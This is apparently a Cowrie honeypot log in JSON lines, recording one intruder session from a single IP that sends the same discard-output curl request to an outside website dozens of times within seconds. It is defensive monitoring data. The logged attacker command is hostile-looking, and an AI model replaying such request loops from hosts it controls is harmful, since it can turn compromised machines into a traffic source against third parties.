{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.939436Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.940201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:29.977859Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:29.978830Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.034719Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.035520Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.077800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.078568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.136939Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.137688Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.185957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.186719Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.225739Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.226750Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.263402Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.263914Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.304772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.305454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.346723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.348174Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.401437Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.402250Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.441405Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.442137Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.480687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.481452Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.519810Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.520535Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.556949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.557623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.594386Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.595146Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.655393Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.656153Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.695687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.696632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.738256Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.739075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.779196Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.779921Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.816287Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.817216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.854100Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.854825Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.905875Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.906647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.945389Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.946170Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:30.986153Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:30.986913Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.025727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.026629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.070296Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.071112Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.107703Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.108536Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.145681Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.146792Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.185584Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.186400Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.229649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.230559Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.267617Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.268820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.313278Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.314181Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.358711Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.359586Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.396533Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.397390Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.434498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.435451Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.472203Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.473072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.512112Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.513079Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.549670Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.550644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.587137Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.588332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.628368Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.629244Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.667820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.668719Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.705800Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.707544Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.751434Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.752298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.797157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.798046Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.834943Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.836098Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.872975Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.873995Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.913010Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.913985Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.957273Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.958182Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:31.996629Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:31.997510Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.035522Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.036428Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.078270Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.079264Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.116756Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.117769Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.157576Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.158905Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.196260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.197152Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.235396Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.236270Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.275727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.276890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.313658Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.314626Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.351499Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.352554Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.396415Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.397258Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.435194Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.435965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.473903Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.474708Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.513959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.514803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.554426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:32.555409Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:32.592585Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
